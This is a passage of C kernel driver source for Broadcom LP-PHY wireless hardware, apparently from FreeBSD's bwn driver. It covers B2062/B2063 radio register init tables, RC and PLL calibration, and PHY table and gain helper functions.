(freq)) / (2 * (freq)) - 8) & 0xff) #define CALC_CTL18(freq, div) \ ((((100 * (freq) + 16000000 * (div)) / (32000000 * (div))) - 1) & 0xff) #define CALC_CTL19(freq, div) \ ((((2 * (freq) + 1000000 * (div)) / (2000000 * (div))) - 1) & 0xff) struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_b2062_freq freqdata_tab[] = { { 12000, { 6, 6, 6, 6, 10, 6 } }, { 13000, { 4, 4, 4, 4, 11, 7 } }, { 14400, { 3, 3, 3, 3, 12, 7 } }, { 16200, { 3, 3, 3, 3, 13, 8 } }, { 18000, { 2, 2, 2, 2, 14, 8 } }, { 19200, { 1, 1, 1, 1, 14, 9 } } }; static const struct bwn_wpair v1[] = { { BWN_B2062_N_TXCTL3, 0 }, { BWN_B2062_N_TXCTL4, 0 }, { BWN_B2062_N_TXCTL5, 0 }, { BWN_B2062_N_TXCTL6, 0 }, { BWN_B2062_N_PDNCTL0, 0x40 }, { BWN_B2062_N_PDNCTL0, 0 }, { BWN_B2062_N_CALIB_TS, 0x10 }, { BWN_B2062_N_CALIB_TS, 0 } }; const struct bwn_b2062_freq *f = NULL; uint32_t xtalfreq, ref; unsigned int i; bwn_phy_lp_b2062_tblinit(mac); for (i = 0; i < N(v1); i++) BWN_RF_WRITE(mac, v1[i].reg, v1[i].value); if (mac->mac_phy.rev > 0) BWN_RF_WRITE(mac, BWN_B2062_S_BG_CTL1, (BWN_RF_READ(mac, BWN_B2062_N_COM2) >> 1) | 0x80); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) BWN_RF_SET(mac, BWN_B2062_N_TSSI_CTL0, 0x1); else BWN_RF_MASK(mac, BWN_B2062_N_TSSI_CTL0, ~0x1); KASSERT(siba_get_cc_caps(sc->sc_dev) & SIBA_CC_CAPS_PMU, ("%s:%d: fail", __func__, __LINE__)); xtalfreq = siba_get_cc_pmufreq(sc->sc_dev) * 1000; KASSERT(xtalfreq != 0, ("%s:%d: fail", __func__, __LINE__)); if (xtalfreq <= 30000000) { plp->plp_div = 1; BWN_RF_MASK(mac, BWN_B2062_S_RFPLLCTL1, 0xfffb); } else { plp->plp_div = 2; BWN_RF_SET(mac, BWN_B2062_S_RFPLLCTL1, 0x4); } BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL7, CALC_CTL7(xtalfreq, plp->plp_div)); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL18, CALC_CTL18(xtalfreq, plp->plp_div)); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL19, CALC_CTL19(xtalfreq, plp->plp_div)); ref = (1000 * plp->plp_div + 2 * xtalfreq) / (2000 * plp->plp_div); ref &= 0xffff; for (i = 0; i < N(freqdata_tab); i++) { if (ref < freqdata_tab[i].freq) { f = &freqdata_tab[i]; break; } } if (f == NULL) f = &freqdata_tab[N(freqdata_tab) - 1]; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL8, ((uint16_t)(f->value[1]) << 4) | f->value[0]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL9, ((uint16_t)(f->value[3]) << 4) | f->value[2]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL10, f->value[4]); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL11, f->value[5]); #undef CALC_CTL7 #undef CALC_CTL18 #undef CALC_CTL19 } static void bwn_phy_lp_b2063_init(struct bwn_mac *mac) { bwn_phy_lp_b2063_tblinit(mac); BWN_RF_WRITE(mac, BWN_B2063_LOGEN_SP5, 0); BWN_RF_SET(mac, BWN_B2063_COM8, 0x38); BWN_RF_WRITE(mac, BWN_B2063_REG_SP1, 0x56); BWN_RF_MASK(mac, BWN_B2063_RX_BB_CTL2, ~0x2); BWN_RF_WRITE(mac, BWN_B2063_PA_SP7, 0); BWN_RF_WRITE(mac, BWN_B2063_TX_RF_SP6, 0x20); BWN_RF_WRITE(mac, BWN_B2063_TX_RF_SP9, 0x40); if (mac->mac_phy.rev == 2) { BWN_RF_WRITE(mac, BWN_B2063_PA_SP3, 0xa0); BWN_RF_WRITE(mac, BWN_B2063_PA_SP4, 0xa0); BWN_RF_WRITE(mac, BWN_B2063_PA_SP2, 0x18); } else { BWN_RF_WRITE(mac, BWN_B2063_PA_SP3, 0x20); BWN_RF_WRITE(mac, BWN_B2063_PA_SP2, 0x20); } } static void bwn_phy_lp_rxcal_r2(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; static const struct bwn_wpair v1[] = { { BWN_B2063_RX_BB_SP8, 0x0 }, { BWN_B2063_RC_CALIB_CTL1, 0x7e }, { BWN_B2063_RC_CALIB_CTL1, 0x7c }, { BWN_B2063_RC_CALIB_CTL2, 0x15 }, { BWN_B2063_RC_CALIB_CTL3, 0x70 }, { BWN_B2063_RC_CALIB_CTL4, 0x52 }, { BWN_B2063_RC_CALIB_CTL5, 0x1 }, { BWN_B2063_RC_CALIB_CTL1, 0x7d } }; static const struct bwn_wpair v2[] = { { BWN_B2063_TX_BB_SP3, 0x0 }, { BWN_B2063_RC_CALIB_CTL1, 0x7e }, { BWN_B2063_RC_CALIB_CTL1, 0x7c }, { BWN_B2063_RC_CALIB_CTL2, 0x55 }, { BWN_B2063_RC_CALIB_CTL3, 0x76 } }; uint32_t freqxtal = siba_get_cc_pmufreq(sc->sc_dev) * 1000; int i; uint8_t tmp; tmp = BWN_RF_READ(mac, BWN_B2063_RX_BB_SP8) & 0xff; for (i = 0; i < 2; i++) BWN_RF_WRITE(mac, v1[i].reg, v1[i].value); BWN_RF_MASK(mac, BWN_B2063_PLL_SP1, 0xf7); for (i = 2; i < N(v1); i++) BWN_RF_WRITE(mac, v1[i].reg, v1[i].value); for (i = 0; i < 10000; i++) { if (BWN_RF_READ(mac, BWN_B2063_RC_CALIB_CTL6) & 0x2) break; DELAY(1000); } if (!(BWN_RF_READ(mac, BWN_B2063_RC_CALIB_CTL6) & 0x2)) BWN_RF_WRITE(mac, BWN_B2063_RX_BB_SP8, tmp); tmp = BWN_RF_READ(mac, BWN_B2063_TX_BB_SP3) & 0xff; for (i = 0; i < N(v2); i++) BWN_RF_WRITE(mac, v2[i].reg, v2[i].value); if (freqxtal == 24000000) { BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL4, 0xfc); BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL5, 0x0); } else { BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL4, 0x13); BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL5, 0x1); } BWN_RF_WRITE(mac, BWN_B2063_PA_SP7, 0x7d); for (i = 0; i < 10000; i++) { if (BWN_RF_READ(mac, BWN_B2063_RC_CALIB_CTL6) & 0x2) break; DELAY(1000); } if (!(BWN_RF_READ(mac, BWN_B2063_RC_CALIB_CTL6) & 0x2)) BWN_RF_WRITE(mac, BWN_B2063_TX_BB_SP3, tmp); BWN_RF_WRITE(mac, BWN_B2063_RC_CALIB_CTL1, 0x7e); } static void bwn_phy_lp_rccal_r12(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; struct bwn_softc *sc = mac->mac_sc; struct bwn_phy_lp_iq_est ie; struct bwn_txgain tx_gains; static const uint32_t pwrtbl[21] = { 0x10000, 0x10557, 0x10e2d, 0x113e0, 0x10f22, 0x0ff64, 0x0eda2, 0x0e5d4, 0x0efd1, 0x0fbe8, 0x0b7b8, 0x04b35, 0x01a5e, 0x00a0b, 0x00444, 0x001fd, 0x000ff, 0x00088, 0x0004c, 0x0002c, 0x0001a, }; uint32_t npwr, ipwr, sqpwr, tmp; int loopback, i, j, sum, error; uint16_t save[7]; uint8_t txo, bbmult, txpctlmode; error = bwn_phy_lp_switch_channel(mac, 7); if (error) device_printf(sc->sc_dev, "failed to change channel to 7 (%d)\n", error); txo = (BWN_PHY_READ(mac, BWN_PHY_AFE_CTL_OVR) & 0x40) ? 1 : 0; bbmult = bwn_phy_lp_get_bbmult(mac); if (txo) tx_gains = bwn_phy_lp_get_txgain(mac); save[0] = BWN_PHY_READ(mac, BWN_PHY_RF_OVERRIDE_0); save[1] = BWN_PHY_READ(mac, BWN_PHY_RF_OVERRIDE_VAL_0); save[2] = BWN_PHY_READ(mac, BWN_PHY_AFE_CTL_OVR); save[3] = BWN_PHY_READ(mac, BWN_PHY_AFE_CTL_OVRVAL); save[4] = BWN_PHY_READ(mac, BWN_PHY_RF_OVERRIDE_2); save[5] = BWN_PHY_READ(mac, BWN_PHY_RF_OVERRIDE_2_VAL); save[6] = BWN_PHY_READ(mac, BWN_PHY_LP_PHY_CTL); bwn_phy_lp_get_txpctlmode(mac); txpctlmode = plp->plp_txpctlmode; bwn_phy_lp_set_txpctlmode(mac, BWN_PHYLP_TXPCTL_OFF); /* disable CRS */ bwn_phy_lp_set_deaf(mac, 1); bwn_phy_lp_set_trsw_over(mac, 0, 1); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfffb); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x4); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfff7); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x8); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0x10); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x10); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xffdf); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x20); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xffbf); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x40); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0x7); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0x38); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xff3f); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0x100); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfdff); BWN_PHY_WRITE(mac, BWN_PHY_PS_CTL_OVERRIDE_VAL0, 0); BWN_PHY_WRITE(mac, BWN_PHY_PS_CTL_OVERRIDE_VAL1, 1); BWN_PHY_WRITE(mac, BWN_PHY_PS_CTL_OVERRIDE_VAL2, 0x20); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfbff); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xf7ff); BWN_PHY_WRITE(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL, 0); BWN_PHY_WRITE(mac, BWN_PHY_RX_GAIN_CTL_OVERRIDE_VAL, 0x45af); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_2, 0x3ff); loopback = bwn_phy_lp_loopback(mac); if (loopback == -1) goto done; bwn_phy_lp_set_rxgain_idx(mac, loopback); BWN_PHY_SETMASK(mac, BWN_PHY_LP_PHY_CTL, 0xffbf, 0x40); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfff8, 0x1); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xffc7, 0x8); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xff3f, 0xc0); tmp = 0; memset(&ie, 0, sizeof(ie)); for (i = 128; i <= 159; i++) { BWN_RF_WRITE(mac, BWN_B2062_N_RXBB_CALIB2, i); sum = 0; for (j = 5; j <= 25; j++) { bwn_phy_lp_ddfs_turnon(mac, 1, 1, j, j, 0); if (!(bwn_phy_lp_rx_iq_est(mac, 1000, 32, &ie))) goto done; sqpwr = ie.ie_ipwr + ie.ie_qpwr; ipwr = ((pwrtbl[j - 5] >> 3) + 1) >> 1; npwr = bwn_phy_lp_roundup(sqpwr, (j == 5) ? sqpwr : 0, 12); sum += ((ipwr - npwr) * (ipwr - npwr)); if ((i == 128) || (sum < tmp)) { plp->plp_rccap = i; tmp = sum; } } } bwn_phy_lp_ddfs_turnoff(mac); done: /* restore CRS */ bwn_phy_lp_clear_deaf(mac, 1); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_0, 0xff80); BWN_PHY_MASK(mac, BWN_PHY_RF_OVERRIDE_2, 0xfc00); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_VAL_0, save[1]); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_0, save[0]); BWN_PHY_WRITE(mac, BWN_PHY_AFE_CTL_OVRVAL, save[3]); BWN_PHY_WRITE(mac, BWN_PHY_AFE_CTL_OVR, save[2]); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_2_VAL, save[5]); BWN_PHY_WRITE(mac, BWN_PHY_RF_OVERRIDE_2, save[4]); BWN_PHY_WRITE(mac, BWN_PHY_LP_PHY_CTL, save[6]); bwn_phy_lp_set_bbmult(mac, bbmult); if (txo) bwn_phy_lp_set_txgain(mac, &tx_gains); bwn_phy_lp_set_txpctlmode(mac, txpctlmode); if (plp->plp_rccap) bwn_phy_lp_set_rccap(mac); } static void bwn_phy_lp_set_rccap(struct bwn_mac *mac) { struct bwn_phy_lp *plp = &mac->mac_phy.phy_lp; uint8_t rc_cap = (plp->plp_rccap & 0x1f) >> 1; if (mac->mac_phy.rev == 1) rc_cap = MIN(rc_cap + 5, 15); BWN_RF_WRITE(mac, BWN_B2062_N_RXBB_CALIB2, MAX(plp->plp_rccap - 4, 0x80)); BWN_RF_WRITE(mac, BWN_B2062_N_TXCTL_A, rc_cap | 0x80); BWN_RF_WRITE(mac, BWN_B2062_S_RXG_CNT16, ((plp->plp_rccap & 0x1f) >> 2) | 0x80); } static uint32_t bwn_phy_lp_roundup(uint32_t value, uint32_t div, uint8_t pre) { uint32_t i, q, r; if (div == 0) return (0); for (i = 0, q = value / div, r = value % div; i < pre; i++) { q <<= 1; if (r << 1 >= div) { q++; r = (r << 1) - div; } } if (r << 1 >= div) q++; return (q); } static void bwn_phy_lp_b2062_reset_pllbias(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL2, 0xff); DELAY(20); if (siba_get_chipid(sc->sc_dev) == 0x5354) { BWN_RF_WRITE(mac, BWN_B2062_N_COM1, 4); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL2, 4); } else { BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL2, 0); } DELAY(5); } static void bwn_phy_lp_b2062_vco_calib(struct bwn_mac *mac) { BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL21, 0x42); BWN_RF_WRITE(mac, BWN_B2062_S_RFPLLCTL21, 0x62); DELAY(200); } static void bwn_phy_lp_b2062_tblinit(struct bwn_mac *mac) { #define FLAG_A 0x01 #define FLAG_G 0x02 struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_b206x_rfinit_entry bwn_b2062_init_tab[] = { { BWN_B2062_N_COM4, 0x1, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_PDNCTL1, 0x0, 0xca, FLAG_G, }, { BWN_B2062_N_PDNCTL3, 0x0, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_PDNCTL4, 0x15, 0x2a, FLAG_A | FLAG_G, }, { BWN_B2062_N_LGENC, 0xDB, 0xff, FLAG_A, }, { BWN_B2062_N_LGENATUNE0, 0xdd, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_LGENATUNE2, 0xdd, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_LGENATUNE3, 0x77, 0xB5, FLAG_A | FLAG_G, }, { BWN_B2062_N_LGENACTL3, 0x0, 0xff, FLAG_A | FLAG_G, }, { BWN_B2062_N_LGENACTL7, 0x33, 0x33, FLAG_A | FLAG_G, }, { BWN_B2062_N_RXA_CTL1, 0x0, 0x0, FLAG_G, }, { BWN_B2062_N_RXBB_CTL0, 0x82, 0x80, FLAG_A | FLAG_G, }, { BWN_B2062_N_RXBB_GAIN1, 0x4, 0x4, FLAG_A | FLAG_G, }, { BWN_B2062_N_RXBB_GAIN2, 0x0, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_N_TXCTL4, 0x3, 0x3, FLAG_A | FLAG_G, }, { BWN_B2062_N_TXCTL5, 0x2, 0x2, FLAG_A | FLAG_G, }, { BWN_B2062_N_TX_TUNE, 0x88, 0x1b, FLAG_A | FLAG_G, }, { BWN_B2062_S_COM4, 0x1, 0x0, FLAG_A | FLAG_G, }, { BWN_B2062_S_PDS_CTL0, 0xff, 0xff, FLAG_A | FLAG_G, }, { BWN_B2062_S_LGENG_CTL0, 0xf8, 0xd8, FLAG_A | FLAG_G, }, { BWN_B2062_S_LGENG_CTL1, 0x3c, 0x24, FLAG_A | FLAG_G, }, { BWN_B2062_S_LGENG_CTL8, 0x88, 0x80, FLAG_A | FLAG_G, }, { BWN_B2062_S_LGENG_CTL10, 0x88, 0x80, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL0, 0x98, 0x98, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL1, 0x10, 0x10, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL5, 0x43, 0x43, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL6, 0x47, 0x47, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL7, 0xc, 0xc, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL8, 0x11, 0x11, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL9, 0x11, 0x11, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL10, 0xe, 0xe, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL11, 0x8, 0x8, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL12, 0x33, 0x33, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL13, 0xa, 0xa, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL14, 0x6, 0x6, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL18, 0x3e, 0x3e, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL19, 0x13, 0x13, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL21, 0x62, 0x62, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL22, 0x7, 0x7, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL23, 0x16, 0x16, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL24, 0x5c, 0x5c, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL25, 0x95, 0x95, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL30, 0xa0, 0xa0, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL31, 0x4, 0x4, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL33, 0xcc, 0xcc, FLAG_A | FLAG_G, }, { BWN_B2062_S_RFPLLCTL34, 0x7, 0x7, FLAG_A | FLAG_G, }, { BWN_B2062_S_RXG_CNT8, 0xf, 0xf, FLAG_A, }, }; const struct bwn_b206x_rfinit_entry *br; unsigned int i; for (i = 0; i < N(bwn_b2062_init_tab); i++) { br = &bwn_b2062_init_tab[i]; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { if (br->br_flags & FLAG_G) BWN_RF_WRITE(mac, br->br_offset, br->br_valueg); } else { if (br->br_flags & FLAG_A) BWN_RF_WRITE(mac, br->br_offset, br->br_valuea); } } #undef FLAG_A #undef FLAG_B } static void bwn_phy_lp_b2063_tblinit(struct bwn_mac *mac) { #define FLAG_A 0x01 #define FLAG_G 0x02 struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static const struct bwn_b206x_rfinit_entry bwn_b2063_init_tab[] = { { BWN_B2063_COM1, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM10, 0x1, 0x0, FLAG_A, }, { BWN_B2063_COM16, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM17, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM18, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM19, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM20, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM21, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM22, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM23, 0x0, 0x0, FLAG_G, }, { BWN_B2063_COM24, 0x0, 0x0, FLAG_G, }, { BWN_B2063_LOGEN_SP1, 0xe8, 0xd4, FLAG_A | FLAG_G, }, { BWN_B2063_LOGEN_SP2, 0xa7, 0x53, FLAG_A | FLAG_G, }, { BWN_B2063_LOGEN_SP4, 0xf0, 0xf, FLAG_A | FLAG_G, }, { BWN_B2063_G_RX_SP1, 0x1f, 0x5e, FLAG_G, }, { BWN_B2063_G_RX_SP2, 0x7f, 0x7e, FLAG_G, }, { BWN_B2063_G_RX_SP3, 0x30, 0xf0, FLAG_G, }, { BWN_B2063_G_RX_SP7, 0x7f, 0x7f, FLAG_A | FLAG_G, }, { BWN_B2063_G_RX_SP10, 0xc, 0xc, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_SP1, 0x3c, 0x3f, FLAG_A, }, { BWN_B2063_A_RX_SP2, 0xfc, 0xfe, FLAG_A, }, { BWN_B2063_A_RX_SP7, 0x8, 0x8, FLAG_A | FLAG_G, }, { BWN_B2063_RX_BB_SP4, 0x60, 0x60, FLAG_A | FLAG_G, }, { BWN_B2063_RX_BB_SP8, 0x30, 0x30, FLAG_A | FLAG_G, }, { BWN_B2063_TX_RF_SP3, 0xc, 0xb, FLAG_A | FLAG_G, }, { BWN_B2063_TX_RF_SP4, 0x10, 0xf, FLAG_A | FLAG_G, }, { BWN_B2063_PA_SP1, 0x3d, 0xfd, FLAG_A | FLAG_G, }, { BWN_B2063_TX_BB_SP1, 0x2, 0x2, FLAG_A | FLAG_G, }, { BWN_B2063_BANDGAP_CTL1, 0x56, 0x56, FLAG_A | FLAG_G, }, { BWN_B2063_JTAG_VCO2, 0xF7, 0xF7, FLAG_A | FLAG_G, }, { BWN_B2063_G_RX_MIX3, 0x71, 0x71, FLAG_A | FLAG_G, }, { BWN_B2063_G_RX_MIX4, 0x71, 0x71, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_1ST2, 0xf0, 0x30, FLAG_A, }, { BWN_B2063_A_RX_PS6, 0x77, 0x77, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_MIX4, 0x3, 0x3, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_MIX5, 0xf, 0xf, FLAG_A | FLAG_G, }, { BWN_B2063_A_RX_MIX6, 0xf, 0xf, FLAG_A | FLAG_G, }, { BWN_B2063_RX_TIA_CTL1, 0x77, 0x77, FLAG_A | FLAG_G, }, { BWN_B2063_RX_TIA_CTL3, 0x77, 0x77, FLAG_A | FLAG_G, }, { BWN_B2063_RX_BB_CTL2, 0x4, 0x4, FLAG_A | FLAG_G, }, { BWN_B2063_PA_CTL1, 0x0, 0x4, FLAG_A, }, { BWN_B2063_VREG_CTL1, 0x3, 0x3, FLAG_A | FLAG_G, }, }; const struct bwn_b206x_rfinit_entry *br; unsigned int i; for (i = 0; i < N(bwn_b2063_init_tab); i++) { br = &bwn_b2063_init_tab[i]; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { if (br->br_flags & FLAG_G) BWN_RF_WRITE(mac, br->br_offset, br->br_valueg); } else { if (br->br_flags & FLAG_A) BWN_RF_WRITE(mac, br->br_offset, br->br_valuea); } } #undef FLAG_A #undef FLAG_B } static void bwn_tab_read_multi(struct bwn_mac *mac, uint32_t typenoffset, int count, void *_data) { unsigned int i; uint32_t offset, type; uint8_t *data = _data; type = BWN_TAB_GETTYPE(typenoffset); offset = BWN_TAB_GETOFFSET(typenoffset); KASSERT(offset <= 0xffff, ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); for (i = 0; i < count; i++) { switch (type) { case BWN_TAB_8BIT: *data = BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO) & 0xff; data++; break; case BWN_TAB_16BIT: *((uint16_t *)data) = BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO); data += 2; break; case BWN_TAB_32BIT: *((uint32_t *)data) = BWN_PHY_READ(mac, BWN_PHY_TABLEDATAHI); *((uint32_t *)data) <<= 16; *((uint32_t *)data) |= BWN_PHY_READ(mac, BWN_PHY_TABLEDATALO); data += 4; break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } } } static void bwn_tab_write_multi(struct bwn_mac *mac, uint32_t typenoffset, int count, const void *_data) { uint32_t offset, type, value; const uint8_t *data = _data; unsigned int i; type = BWN_TAB_GETTYPE(typenoffset); offset = BWN_TAB_GETOFFSET(typenoffset); KASSERT(offset <= 0xffff, ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLE_ADDR, offset); for (i = 0; i < count; i++) { switch (type) { case BWN_TAB_8BIT: value = *data; data++; KASSERT(!(value & ~0xff), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; case BWN_TAB_16BIT: value = *((const uint16_t *)data); data += 2; KASSERT(!(value & ~0xffff), ("%s:%d: fail", __func__, __LINE__)); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; case BWN_TAB_32BIT: value = *((const uint32_t *)data); data += 4; BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATAHI, value >> 16); BWN_PHY_WRITE(mac, BWN_PHY_TABLEDATALO, value); break; default: KASSERT(0 == 1, ("%s:%d: fail", __func__, __LINE__)); } } } static struct bwn_txgain bwn_phy_lp_get_txgain(struct bwn_mac *mac) { struct bwn_txgain tg; uint16_t tmp; tg.tg_dac = (BWN_PHY_READ(mac, BWN_PHY_AFE_DAC_CTL) & 0x380) >> 7; if (mac->mac_phy.rev < 2) { tmp = BWN_PHY_READ(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL) & 0x7ff; tg.tg_gm = tmp & 0x0007; tg.tg_pga = (tmp & 0x0078) >> 3; tg.tg_pad = (tmp & 0x780) >> 7; return (tg); } tmp = BWN_PHY_READ(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL); tg.tg_pad = BWN_PHY_READ(mac, BWN_PHY_OFDM(0xfb)) & 0xff; tg.tg_gm = tmp & 0xff; tg.tg_pga = (tmp >> 8) & 0xff; return (tg); } static uint8_t bwn_phy_lp_get_bbmult(struct bwn_mac *mac) { return (bwn_tab_read(mac, BWN_TAB_2(0, 87)) & 0xff00) >> 8; } static void bwn_phy_lp_set_txgain(struct bwn_mac *mac, struct bwn_txgain *tg) { uint16_t pa; if (mac->mac_phy.rev < 2) { BWN_PHY_SETMASK(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL, 0xf800, (tg->tg_pad << 7) | (tg->tg_pga << 3) | tg->tg_gm); bwn_phy_lp_set_txgain_dac(mac, tg->tg_dac); bwn_phy_lp_set_txgain_override(mac); return; } pa = bwn_phy_lp_get_pa_gain(mac); BWN_PHY_WRITE(mac, BWN_PHY_TX_GAIN_CTL_OVERRIDE_VAL, (tg->tg_pga << 8) | tg->tg_gm); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xfb), 0x8000, tg->tg_pad | (pa << 6)); BWN_PHY_WRITE(mac, BWN_PHY_OFDM(0xfc), (tg->tg_pga << 8) | tg->tg_gm); BWN_PHY_SETMASK(mac, BWN_PHY_OFDM(0xfd), 0x8000, tg->tg_pad | (pa << 8)); bwn_phy_lp_set_txgain_dac(mac, tg->tg_dac); bwn_phy_lp_set_txgain_override(mac); } static void bwn_phy_lp_set_bbmult(struct bwn_mac *mac, uint8_t bbmult) { bwn_tab_write(mac, BWN_TAB_2(0, 87), (uint16_t)bbmult << 8); } static void bwn_phy_lp_set_trsw_over(struct bwn_mac *mac, uint8_t tx, uint8_t rx) { uint16_t trsw = (tx << 1) | rx; BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfffc, trsw); BWN_PHY_SET(mac, BWN_PHY_RF_OVERRIDE_0, 0x3); } static void bwn_phy_lp_set_rxgain(struct bwn_mac *mac, uint32_t gain) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t ext_lna, high_gain, lna, low_gain, trsw, tmp; if (mac->mac_phy.rev < 2) { trsw = gain & 0x1; lna = (gain & 0xfffc) | ((gain & 0xc) >> 2); ext_lna = (gain & 2) >> 1; BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_VAL_0, 0xfffe, trsw); BWN_PHY_SETMASK(mac, BWN_PHY_RF_OVERRIDE_2_VAL, 0xfbff, ext_lna << 10); BWN_PHY_SETMASK(mac, 